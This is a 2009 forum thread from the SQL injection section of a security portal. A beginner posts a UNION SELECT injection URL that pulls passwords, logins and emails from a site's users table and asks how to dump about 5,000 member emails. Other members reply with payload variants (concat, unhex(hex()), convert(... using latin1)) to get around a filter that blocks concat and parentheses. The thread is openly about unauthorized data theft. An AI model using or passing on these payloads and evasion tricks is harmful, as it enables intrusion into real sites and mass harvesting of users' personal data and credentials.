 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
help with dumping emails from sqli |
 |
 Posted: Tue Apr 28, 2009 4:03 pm |
 |
|
| jopiede |
| Beginner |
 |
|
| Joined: Apr 28, 2009 |
| Posts: 4 |
|
|
|
 |
|
 |
|
Dear members,
I have found several sqlinjections to some sites. But for al those sites you need to logon first. So i cant use any program to extract the emails.
My sqli looks like this right now:
| Code: | | http://www.host.com/forum.php?topic=-1+UNION+ALL+SELECT+1,2,3,pass,5,login,email,8,9,10,11,12,13+FROM+%60[users]%60-- |
Its like 5k users. Can sum1 tell me how to dump only the email
Cheers! |
|
|
|
|
|
Re: help with dumping emails from sqli |
|
| Posted: Tue Apr 28, 2009 4:15 pm |
|
|
| crazynou |
| Advanced user |
 |
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
|
|
|
|
| jopiede wrote: | Dear members,
I have found several sqlinjections to some sites. But for al those sites you need to logon first. So i cant use any program to extract the emails.
My sqli looks like this right now:
| Code: | | http://www.host.com/forum.php?topic=-1+UNION+ALL+SELECT+1,2,3,pass,5,login,email,8,9,10,11,12,13+FROM+%60[users]%60-- |
Its like 5k users. Can sum1 tell me how to dump only the email
Cheers! |
test this:
,concat_ws(email),
,concat(email), |
|
|
|
|
| Posted: Tue Apr 28, 2009 4:24 pm |
|
|
| jopiede |
| Beginner |
|
|
| Joined: Apr 28, 2009 |
| Posts: 4 |
|
|
|
|
|
|
|
Nope, doesnt work cuz they filter on concat i found out is there anyway to do it without concat?  |
|
|
|
|
| Posted: Tue Apr 28, 2009 4:43 pm |
|
|
| crazynou |
| Advanced user |
|
|
| Joined: Feb 08, 2009 |
| Posts: 199 |
| Location: AlGeRiA |
|
|
|
|
|
|
try this
unhex(hex(concat(email))) |
|
|
|
|
| Posted: Tue Apr 28, 2009 5:14 pm |
|
|
| jopiede |
| Beginner |
|
|
| Joined: Apr 28, 2009 |
| Posts: 4 |
|
|
|
|
|
|
|
no its not working cuz if you type the word:concat on one site and ( )on the other both automaticly blocks and say: Dont try to cheat.
So concat or ( ) is no option. I do see the mail, but i want to extract em from 5k members easily by 100x 50 or 1000x5 thats less work than copy each member..
Thx |
|
|
|
|
| Posted: Tue Apr 28, 2009 6:34 pm |
|
|
| brisk |
| Advanced user |
|
|
| Joined: Mar 07, 2009 |
| Posts: 108 |
|
|
|
|
|
|
|
| jopiede wrote: | no its not working cuz if you type the word:concat on one site and ( )on the other both automaticly blocks and say: Dont try to cheat.
So concat or ( ) is no option. I do see the mail, but i want to extract em from 5k members easily by 100x 50 or 1000x5 thats less work than copy each member..
Thx |
convert(email using latin1) |
|
|
|
|
| Posted: Wed Apr 29, 2009 2:47 pm |
|
|
| jopiede |
| Beginner |
|
|
| Joined: Apr 28, 2009 |
| Posts: 4 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
